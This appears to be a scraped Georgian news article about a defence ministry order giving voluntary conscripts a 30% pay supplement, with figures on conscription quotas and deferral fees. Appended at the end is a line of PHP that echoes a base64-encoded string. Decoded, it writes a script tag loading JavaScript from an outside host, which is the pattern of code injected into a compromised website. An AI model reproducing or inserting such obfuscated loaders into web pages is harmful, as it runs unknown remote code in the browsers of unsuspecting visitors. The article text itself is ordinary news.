gorgia
ავერსი jaluzi

სამხედრო სამსახურში საკუთარი სურვილით წასული წვევამდელები მიიღებენ 30%-იან დანამატს. შესაბამისი ბრძანება საქართველოს თავდაცვის მინისტრმა 18 მარტს გამოსცა.

ცვლილების თანახმად, „საქართველოს თავდაცვის სამინისტროს მოსამსახურეთა შრომის ანაზღაურების, სოციალური დაცვისა და მატერიალური უზრუნველყოფის პირობების დამტკიცების შესახებ“ საქართველოს თავდაცვის მინისტრის 2018 წლის 15 იანვრის №1 ბრძანებას დაემატა კიდევ ერთი მუხლი, რომელშიც აღნიშნულია, რომ "წვევამდელთა ეროვნულ სამხედრო სამსახურში საკუთარი სურვილით გაწვეულ პირს, სსიპ – სამხედრო გაწვევისა და რეკრუტირების ეროვნული სააგენტოს მიერ გაცემული ცნობის საფუძველზე, მიეცემა დანამატი წოდებრივი სარგოს 30 პროცენტის ოდენობით.“

ცნობისთვის, საქართველოს მთავრობის დადგენილების თანახმად, მიმდინარე წელს წვევამდელთა ეროვნულ სამხედრო სამსახურში გაწვევა 2025 წლის 15 იანვრიდან 1 დეკემბრამდე პერიოდში უნდა განხორციელდეს. ამასთან, წვევამდელთა ეროვნულ სამხედრო სამსახურში გაწვევა უნდა განხორციელდეს საქართველოს თავდაცვის სამინისტროს სისტემაში და გასაწვევ პირთა მაქსიმალური რაოდენობაა 4510.

აღსანიშნავია, რომ პირს უფლება აქვს სამხედრო სამსახურში გაწვევა გადაავადოს გარკვეული პირობების შემთხვევაში, ოღონდ ამისთვის მოსაკრებელი უნდა გადაიხადოს 1 წლის ვადით გადავადების შემთხვევაში 5000 ლარის ოდენობით, 1 იანვრამდე ეს თანხა 2000 ლარს შეადგენდა.

2024 წლის პირველ ნახევარში სავალდებულო სამხედრო სამსახურის გადავადების მოსაკრებლიდან ბიუჯეტმა 3,549,089 ლარის შემოსავალი მიიღო. ეს თანხა წინა წლის ანალოგიურ პერიოდთან შედარებით 3.6-ჯერ მეტია.

თავდაცვის მინისტრის ბრძანების შესაბამისად, მოქალაქეს წვევამდელთა ეროვნულ სამხედრო სამსახურში გაწვევის გადავადების მოსაკრებლის გადახდის უფლებით შეუძლია ისარგებლოს 25 წლის მიღწევამდე.

222
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");